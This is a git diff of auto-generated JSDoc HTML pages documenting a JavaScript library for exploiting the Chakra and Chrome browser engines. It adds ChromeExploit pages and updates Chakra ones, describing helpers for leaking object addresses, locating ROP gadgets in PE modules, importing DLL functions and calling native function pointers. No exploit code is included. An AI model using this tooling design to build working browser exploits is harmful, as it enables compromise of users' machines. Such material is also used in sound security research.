diff --git a/docs/ChakraExploit_CString.html b/docs/ChakraExploit_CString.html index 37d06be..779a721 100644 --- a/docs/ChakraExploit_CString.html +++ b/docs/ChakraExploit_CString.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new CStringSource:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_FunctionType.html b/docs/ChakraExploit_FunctionType.html index ea2d679..193aa8d 100644 --- a/docs/ChakraExploit_FunctionType.html +++ b/docs/ChakraExploit_FunctionType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Funct
Source:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_IntType.html b/docs/ChakraExploit_IntType.html index fabe989..5198d5d 100644 --- a/docs/ChakraExploit_IntType.html +++ b/docs/ChakraExploit_IntType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new IntTypeSource:
@@ -254,7 +254,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_Pointer.html b/docs/ChakraExploit_Pointer.html index ec791cd..76ec349 100644 --- a/docs/ChakraExploit_Pointer.html +++ b/docs/ChakraExploit_Pointer.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new PointerSource:
@@ -243,7 +243,7 @@
Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_PointerType.html b/docs/ChakraExploit_PointerType.html index 59a0198..df6f9cb 100644 --- a/docs/ChakraExploit_PointerType.html +++ b/docs/ChakraExploit_PointerType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Pointe
Source:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_StructPointer.html b/docs/ChakraExploit_StructPointer.html index 9202830..4ec806d 100644 --- a/docs/ChakraExploit_StructPointer.html +++ b/docs/ChakraExploit_StructPointer.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Stru
Source:
@@ -243,7 +243,7 @@

Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_StructType.html b/docs/ChakraExploit_StructType.html index 0547260..edbc3ba 100644 --- a/docs/ChakraExploit_StructType.html +++ b/docs/ChakraExploit_StructType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new StructT
Source:
@@ -274,7 +274,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_Thread.html b/docs/ChakraExploit_Thread.html index 14403fc..e515131 100644 --- a/docs/ChakraExploit_Thread.html +++ b/docs/ChakraExploit_Thread.html @@ -22,7 +22,7 @@
@@ -334,7 +334,7 @@

postMessag
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_Type.html b/docs/ChakraExploit_Type.html index 8796bfa..3625904 100644 --- a/docs/ChakraExploit_Type.html +++ b/docs/ChakraExploit_Type.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new TypeSource:
@@ -171,7 +171,7 @@

new Type
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_WString.html b/docs/ChakraExploit_WString.html index ff6f8fd..426f2fc 100644 --- a/docs/ChakraExploit_WString.html +++ b/docs/ChakraExploit_WString.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new WStringSource:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit.html b/docs/ChakraThreadExploit.html index afbdaf2..44a268d 100644 --- a/docs/ChakraThreadExploit.html +++ b/docs/ChakraThreadExploit.html @@ -22,7 +22,7 @@
@@ -209,7 +209,7 @@

Int8Source:
@@ -283,7 +283,7 @@

Int8PtrSource:
@@ -357,7 +357,7 @@

Int16Source:
@@ -431,7 +431,7 @@

Int16PtrSource:
@@ -505,7 +505,7 @@

Int32Source:
@@ -579,7 +579,7 @@

Int32PtrSource:
@@ -653,7 +653,7 @@

Int64Source:
@@ -727,7 +727,7 @@

Int64PtrSource:
@@ -801,7 +801,7 @@

Uint8Source:
@@ -875,7 +875,7 @@

Uint8PtrSource:
@@ -949,7 +949,7 @@

Uint16Source:
@@ -1023,7 +1023,7 @@

Uint16PtrSource:
@@ -1097,7 +1097,7 @@

Uint32Source:
@@ -1171,7 +1171,7 @@

Uint32PtrSource:
@@ -1245,7 +1245,7 @@

Uint64Source:
@@ -1319,7 +1319,7 @@

Uint64PtrSource:
@@ -1403,7 +1403,7 @@

addressOfSource:
@@ -1547,7 +1547,7 @@
Returns:
-

addressOfSlow(obj) → {Pointer}

+

addressOfArrayBuffer(ab) → {Pointer}

@@ -1559,7 +1559,7 @@

addressO
Source:
@@ -1570,7 +1570,7 @@

addressO
Inherited From:
@@ -1604,7 +1604,7 @@

addressO
- Returns the address of a Javascript object. Internal. + Returns the address of ArrayBuffer contents.
@@ -1642,13 +1642,13 @@

Parameters:
- obj + ab -* +ArrayBuffer @@ -1658,7 +1658,7 @@
Parameters:
- Any Javascript object + ArrayBuffer @@ -1703,7 +1703,7 @@
Returns:
-

addressOfString(s) → {Pointer}

+

addressOfSlow(obj) → {Pointer}

@@ -1715,7 +1715,7 @@

addres
Source:
@@ -1726,7 +1726,7 @@

addres
Inherited From:
@@ -1760,7 +1760,7 @@

addres
- Returns the address of a string. Points to the string's bytes. + Returns the address of a Javascript object. Internal.
@@ -1798,13 +1798,13 @@

Parameters:
- s + obj -string +* @@ -1814,7 +1814,7 @@
Parameters:
- A Javascript string + Any Javascript object @@ -1871,7 +1871,7 @@

callSource:
@@ -2070,7 +2070,7 @@

findGadget<
Source:
@@ -2252,7 +2252,7 @@

findGadget
Source:
@@ -2434,7 +2434,7 @@

findMod
Source:
@@ -2590,7 +2590,7 @@

importF
Source:
@@ -3287,7 +3287,7 @@

Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_ArrayType.html b/docs/ChakraThreadExploit_ArrayType.html index 5d86957..cf7faad 100644 --- a/docs/ChakraThreadExploit_ArrayType.html +++ b/docs/ChakraThreadExploit_ArrayType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new ArrayTyp
Source:
@@ -254,7 +254,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_CString.html b/docs/ChakraThreadExploit_CString.html index f5b9f4a..f16db3e 100644 --- a/docs/ChakraThreadExploit_CString.html +++ b/docs/ChakraThreadExploit_CString.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new CStringSource:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_FunctionType.html b/docs/ChakraThreadExploit_FunctionType.html index f61d7dc..e9788f7 100644 --- a/docs/ChakraThreadExploit_FunctionType.html +++ b/docs/ChakraThreadExploit_FunctionType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Funct
Source:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_IntType.html b/docs/ChakraThreadExploit_IntType.html index fffe4aa..8e6cd74 100644 --- a/docs/ChakraThreadExploit_IntType.html +++ b/docs/ChakraThreadExploit_IntType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new IntTypeSource:
@@ -254,7 +254,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_Pointer.html b/docs/ChakraThreadExploit_Pointer.html index 5956a15..9385a3e 100644 --- a/docs/ChakraThreadExploit_Pointer.html +++ b/docs/ChakraThreadExploit_Pointer.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new PointerSource:
@@ -243,7 +243,7 @@
Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_PointerType.html b/docs/ChakraThreadExploit_PointerType.html index 848cab3..3279fa2 100644 --- a/docs/ChakraThreadExploit_PointerType.html +++ b/docs/ChakraThreadExploit_PointerType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Pointe
Source:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_StructPointer.html b/docs/ChakraThreadExploit_StructPointer.html index 65c02d7..c230d15 100644 --- a/docs/ChakraThreadExploit_StructPointer.html +++ b/docs/ChakraThreadExploit_StructPointer.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Stru
Source:
@@ -243,7 +243,7 @@

Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_StructType.html b/docs/ChakraThreadExploit_StructType.html index 1622148..a38349e 100644 --- a/docs/ChakraThreadExploit_StructType.html +++ b/docs/ChakraThreadExploit_StructType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new StructT
Source:
@@ -274,7 +274,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_Thread.html b/docs/ChakraThreadExploit_Thread.html index 3d5af75..49a4c48 100644 --- a/docs/ChakraThreadExploit_Thread.html +++ b/docs/ChakraThreadExploit_Thread.html @@ -22,7 +22,7 @@
@@ -171,7 +171,7 @@

new Thread
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_Type.html b/docs/ChakraThreadExploit_Type.html index 3ccd234..dc0726f 100644 --- a/docs/ChakraThreadExploit_Type.html +++ b/docs/ChakraThreadExploit_Type.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new TypeSource:
@@ -171,7 +171,7 @@

new Type
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraThreadExploit_WString.html b/docs/ChakraThreadExploit_WString.html index 4e9c434..15a27a1 100644 --- a/docs/ChakraThreadExploit_WString.html +++ b/docs/ChakraThreadExploit_WString.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new WStringSource:
@@ -231,7 +231,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChromeExploit.html b/docs/ChromeExploit.html new file mode 100644 index 0000000..39056ec --- /dev/null +++ b/docs/ChromeExploit.html @@ -0,0 +1,2915 @@ + + + + + ChromeExploit - Documentation + + + + + + + + + + + + + + + + +
+ +

ChromeExploit

+ + + + + + + +
+ +
+ +

+ ChromeExploit +

+ + +
+ +
+
+ + + + + +

new ChromeExploit()

+ + + + + + +
+ + +
Source:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs an exploit with sensible defaults for Chrome. Child must call initChrome method once read and write methods are available. +
+ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + + + + + + + + + +

Classes

+ +
+
ArrayType
+
+ +
CString
+
+ +
FunctionType
+
+ +
IntType
+
+ +
Pointer
+
+ +
PointerType
+
+ +
StructPointer
+
+ +
StructType
+
+ +
Type
+
+ +
WString
+
+
+ + + + + + + +

Members

+ + + +

Int8 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
  • +
+ + + + + + + + +

Int8Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
  • +
+ + + + + + + + +

Int16 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
  • +
+ + + + + + + + +

Int16Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
  • +
+ + + + + + + + +

Int32 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
  • +
+ + + + + + + + +

Int32Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
  • +
+ + + + + + + + +

Int64 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
  • +
+ + + + + + + + +

Int64Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
  • +
+ + + + + + + + +

Uint8 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
  • +
+ + + + + + + + +

Uint8Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
  • +
+ + + + + + + + +

Uint16 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
  • +
+ + + + + + + + +

Uint16Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
  • +
+ + + + + + + + +

Uint32 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
  • +
+ + + + + + + + +

Uint32Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
  • +
+ + + + + + + + +

Uint64 :IntType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +IntType + + +
  • +
+ + + + + + + + +

Uint64Ptr :PointerType

+ + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + +
Type:
+
    +
  • + +PointerType + + +
  • +
+ + + + + + + + + + +

Methods

+ + + + + + +

addressOf(obj) → {Pointer}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Returns the address of a Javascript object. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
obj + + +* + + + + Any Javascript object
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +Pointer + + +
+
+ + + + + + + + + +

addressOfArrayBuffer(ab) → {Pointer}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Returns the address of ArrayBuffer contents. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
ab + + +ArrayBuffer + + + + ArrayBuffer
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +Pointer + + +
+
+ + + + + + + + + +

addressOfSlow(obj) → {Pointer}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Returns the address of a Javascript object. Internal. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
obj + + +* + + + + Any Javascript object
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +Pointer + + +
+
+ + + + + + + + + +

call(address, …args) → {Integer}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Call a function pointer with the given arguments. Used internally by FunctionPointer. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeAttributesDescription
address + + +Integer + + + + + + + + + +
args + + +Integer + + + + + + + + + + <repeatable>
+ +
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +Integer + + +
+
+ + + + + + + + + +

findGadget(module, bytes) → {Integer}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Find a set of bytes in a PE module. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
module + + +Integer +| + +Pointer + + + + Base address of PE module
bytes + + +Array + + + + Bytes to locate
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +Integer + + +
+
+ + + + + + + + + +

findGadgets(module, query) → {object}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Find multiple sets of bytes in a PE module. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
module + + +Integer +| + +Pointer + + + + Base address of PE module
query + + +Array + + + + Array of gadgets to find
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +object + + +
+
+ + + + + + + + + +

findModuleBase(address) → {Integer}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Find the beginning of a PE module given any address in the module. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
address + + +Integer + + + + Any address in the PE module
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +Integer + + +
+
+ + + + + + + + + +

importFunction(dllName, funcName, returnType) → {function}

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Loads a DLL (if not loaded already) and finds the given export. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
dllName + + +string + + + + The name of DLL to find the function from.
funcName + + +string + + + + The name of function to import.
returnType + + +Type + + + + The type of the function return.
+ + + + + + + + + + + + + + +
Returns:
+ + + + +
+
+ Type +
+
+ +function + + +
+
+ + + + + + + + + +

initChrome(vtable)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Initializes Chrome helpers using memory read and write. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
vtable + + +Integer +| + +Pointer + + + + Any address in the chrome DLL
+ + + + + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_ArrayType.html b/docs/ChromeExploit_ArrayType.html new file mode 100644 index 0000000..831cf67 --- /dev/null +++ b/docs/ChromeExploit_ArrayType.html @@ -0,0 +1,263 @@ + + + + + ArrayType - Documentation + + + + + + + + + + + + + + + + +
+ +

ArrayType

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + ArrayType +

+ + +
+ +
+
+ + + + + +

new ArrayType(base, length)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs an array type. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
base + + +Type + + + + Base type
length + + +integer + + + + Number of array elements
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Type
  • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_CString.html b/docs/ChromeExploit_CString.html new file mode 100644 index 0000000..c2e5f25 --- /dev/null +++ b/docs/ChromeExploit_CString.html @@ -0,0 +1,240 @@ + + + + + CString - Documentation + + + + + + + + + + + + + + + + +
+ +

CString

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + CString +

+ + +
+ +
+
+ + + + + +

new CString(s)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a pointer to a C string. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
s + + +string + + + + A string to make into a C string.
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Pointer
  • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_FunctionType.html b/docs/ChromeExploit_FunctionType.html new file mode 100644 index 0000000..99b93bb --- /dev/null +++ b/docs/ChromeExploit_FunctionType.html @@ -0,0 +1,240 @@ + + + + + FunctionType - Documentation + + + + + + + + + + + + + + + + +
+ +

FunctionType

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + FunctionType +

+ + +
+ +
+
+ + + + + +

new FunctionType(returnType)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a function pointer type. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
returnType + + +Type + + + + Type of return value
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Type
  • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_IntType.html b/docs/ChromeExploit_IntType.html new file mode 100644 index 0000000..c0aa736 --- /dev/null +++ b/docs/ChromeExploit_IntType.html @@ -0,0 +1,263 @@ + + + + + IntType - Documentation + + + + + + + + + + + + + + + + +
+ +

IntType

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + IntType +

+ + +
+ +
+
+ + + + + +

new IntType(bits, signed)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs an integer type. Internal. Use predefined Int and Uint type objects. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
bits + + +integer + + + + Bit size
signed + + +boolean + + + + Whether signed or not
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Type
  • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_Pointer.html b/docs/ChromeExploit_Pointer.html new file mode 100644 index 0000000..bf93e57 --- /dev/null +++ b/docs/ChromeExploit_Pointer.html @@ -0,0 +1,252 @@ + + + + + Pointer - Documentation + + + + + + + + + + + + + + + + +
+ +

Pointer

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + Pointer +

+ + +
+ +
+
+ + + + + +

new Pointer(base, address)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a pointer to a certain type. +
+ + + + + + + + + + + +
Parameters:
